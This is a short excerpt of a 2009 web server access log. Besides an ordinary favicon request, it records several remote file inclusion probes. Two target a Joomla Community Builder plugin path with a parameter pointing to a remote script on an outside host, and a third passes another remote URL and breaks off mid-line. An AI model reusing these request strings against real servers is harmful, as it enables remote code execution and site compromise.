83.132.78.6 - - [25/May/2009:04:35:21 -0400] "GET /cgi-bin/favicon.ico HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1518.856; Windows 6.0; MSIE 7.0.6001.18000)"
88.84.130.178 - - [25/May/2009:04:35:51 -0400] "GET /logs/access_log.Q108081600%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:04:36:11 -0400] "GET /logs/access_log.Q108090100%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
123.143.98.5 - - [25/May/2009:04:37:15 -0400] "GET /logs/error_log.Q108090500%20/?sourcedir=http://saeng